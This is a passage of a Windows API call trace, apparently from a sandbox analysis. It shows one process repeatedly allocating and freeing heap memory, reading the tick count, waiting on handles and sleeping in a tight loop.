returned 0x2130883 [0188.897] GetTickCount () returned 0x2130883 [0188.897] GetTickCount () returned 0x2130883 [0188.897] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.897] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.897] GetTickCount () returned 0x2130883 [0188.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79650 [0188.897] GetTickCount () returned 0x2130883 [0188.897] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79650 | out: hHeap=0x2150000) returned 1 [0188.897] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.900] GetTickCount () returned 0x2131128 [0188.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.900] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.900] GetTickCount () returned 0x2131128 [0188.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.900] GetTickCount () returned 0x2131128 [0188.900] GetTickCount () returned 0x2131128 [0188.900] GetTickCount () returned 0x2131128 [0188.900] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.900] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.900] GetTickCount () returned 0x2131128 [0188.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.900] GetTickCount () returned 0x2131128 [0188.900] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.901] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.904] GetTickCount () returned 0x21319be [0188.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.904] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.904] GetTickCount () returned 0x21319be [0188.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.904] GetTickCount () returned 0x21319be [0188.904] GetTickCount () returned 0x21319be [0188.904] GetTickCount () returned 0x21319be [0188.904] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.904] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.904] GetTickCount () returned 0x21319be [0188.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.904] GetTickCount () returned 0x21319be [0188.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.911] GetTickCount () returned 0x2132254 [0188.911] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0188.911] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.911] GetTickCount () returned 0x2132254 [0188.911] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.911] GetTickCount () returned 0x2132254 [0188.911] GetTickCount () returned 0x2132254 [0188.911] GetTickCount () returned 0x2132254 [0188.911] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.911] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.911] GetTickCount () returned 0x2132254 [0188.911] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.911] GetTickCount () returned 0x2132254 [0188.911] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.912] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0188.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.915] GetTickCount () returned 0x2132afa [0188.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.915] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.915] GetTickCount () returned 0x2132afa [0188.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.915] GetTickCount () returned 0x2132afa [0188.915] GetTickCount () returned 0x2132afa [0188.915] GetTickCount () returned 0x2132afa [0188.915] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.915] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.915] GetTickCount () returned 0x2132afa [0188.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.915] GetTickCount () returned 0x2132afa [0188.915] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.915] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.918] GetTickCount () returned 0x2133390 [0188.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.918] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.918] GetTickCount () returned 0x2133390 [0188.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.918] GetTickCount () returned 0x2133390 [0188.918] GetTickCount () returned 0x2133390 [0188.918] GetTickCount () returned 0x2133390 [0188.918] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.918] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.918] GetTickCount () returned 0x2133390 [0188.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.918] GetTickCount () returned 0x2133390 [0188.919] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.919] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.921] GetTickCount () returned 0x2133c26 [0188.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.922] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.922] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.922] GetTickCount () returned 0x2133c26 [0188.922] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.922] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.926] GetTickCount () returned 0x21344bc [0188.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.926] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.926] GetTickCount () returned 0x21344bc [0188.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.926] GetTickCount () returned 0x21344bc [0188.926] GetTickCount () returned 0x21344bc [0188.926] GetTickCount () returned 0x21344bc [0188.926] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.926] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.926] GetTickCount () returned 0x21344bc [0188.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.926] GetTickCount () returned 0x21344bc [0188.926] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.926] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.929] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.929] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.929] GetTickCount () returned 0x2134d62 [0188.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0188.929] GetTickCount () returned 0x2134d62 [0188.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0188.930] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0188.933] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.933] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.933] GetTickCount () returned 0x21355f8 [0188.933] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.933] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0188.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.938] GetTickCount () returned 0x2135e8e [0188.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.938] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.938] GetTickCount () returned 0x2135e8e [0188.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0188.938] GetTickCount () returned 0x2135e8e [0188.938] GetTickCount () returned 0x2135e8e [0188.938] GetTickCount () returned 0x2135e8e [0188.938] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798c0 | out: hHeap=0x2150000) returned 1 [0188.938] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.938] GetTickCount () returned 0x2135e8e [0188.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.938] GetTickCount () returned 0x2135e8e [0188.938] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.938] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.943] GetTickCount () returned 0x2136724 [0188.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.943] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.943] GetTickCount () returned 0x2136724 [0188.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0188.943] GetTickCount () returned 0x2136724 [0188.943] GetTickCount () returned 0x2136724 [0188.943] GetTickCount () returned 0x2136724 [0188.943] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0188.943] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.943] GetTickCount () returned 0x2136724 [0188.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0188.943] GetTickCount () returned 0x2136724 [0188.944] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0188.944] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0188.947] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0188.947] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.947] GetTickCount () returned 0x2136fc9 [0188.947] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.947] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0188.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.951] GetTickCount () returned 0x213785f [0188.951] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0188.951] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.952] GetTickCount () returned 0x213785f [0188.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.952] GetTickCount () returned 0x213785f [0188.952] GetTickCount () returned 0x213785f [0188.952] GetTickCount () returned 0x213785f [0188.952] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.952] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.952] GetTickCount () returned 0x213785f [0188.952] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.952] GetTickCount () returned 0x213785f [0188.952] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.952] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0188.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.956] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.956] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.956] GetTickCount () returned 0x21380f5 [0188.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.957] GetTickCount () returned 0x21380f5 [0188.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.957] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.960] GetTickCount () returned 0x213898b [0188.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.960] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.960] GetTickCount () returned 0x213898b [0188.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0188.960] GetTickCount () returned 0x213898b [0188.960] GetTickCount () returned 0x213898b [0188.960] GetTickCount () returned 0x213898b [0188.960] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0188.960] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.960] GetTickCount () returned 0x213898b [0188.960] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.960] GetTickCount () returned 0x213898b [0188.960] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.960] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.963] GetTickCount () returned 0x2139231 [0188.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.963] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.963] GetTickCount () returned 0x2139231 [0188.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0188.963] GetTickCount () returned 0x2139231 [0188.963] GetTickCount () returned 0x2139231 [0188.963] GetTickCount () returned 0x2139231 [0188.963] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0188.963] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.963] GetTickCount () returned 0x2139231 [0188.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0188.963] GetTickCount () returned 0x2139231 [0188.963] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0188.964] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0188.967] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.967] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.967] GetTickCount () returned 0x2139ac7 [0188.967] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.967] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0188.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.972] GetTickCount () returned 0x213a35d [0188.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.972] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.972] GetTickCount () returned 0x213a35d [0188.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.972] GetTickCount () returned 0x213a35d [0188.972] GetTickCount () returned 0x213a35d [0188.972] GetTickCount () returned 0x213a35d [0188.972] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.972] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.972] GetTickCount () returned 0x213a35d [0188.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.972] GetTickCount () returned 0x213a35d [0188.972] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.973] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.976] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.976] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0188.976] GetTickCount () returned 0x213ac02 [0188.976] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0188.976] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.979] GetTickCount () returned 0x213b498 [0188.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0188.979] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.979] GetTickCount () returned 0x213b498 [0188.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0188.979] GetTickCount () returned 0x213b498 [0188.979] GetTickCount () returned 0x213b498 [0188.979] GetTickCount () returned 0x213b498 [0188.979] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0188.979] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.979] GetTickCount () returned 0x213b498 [0188.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.979] GetTickCount () returned 0x213b498 [0188.980] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.980] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0188.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.985] GetTickCount () returned 0x213bd2e [0188.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0188.985] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.985] GetTickCount () returned 0x213bd2e [0188.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0188.985] GetTickCount () returned 0x213bd2e [0188.985] GetTickCount () returned 0x213bd2e [0188.985] GetTickCount () returned 0x213bd2e [0188.985] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0188.985] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.985] 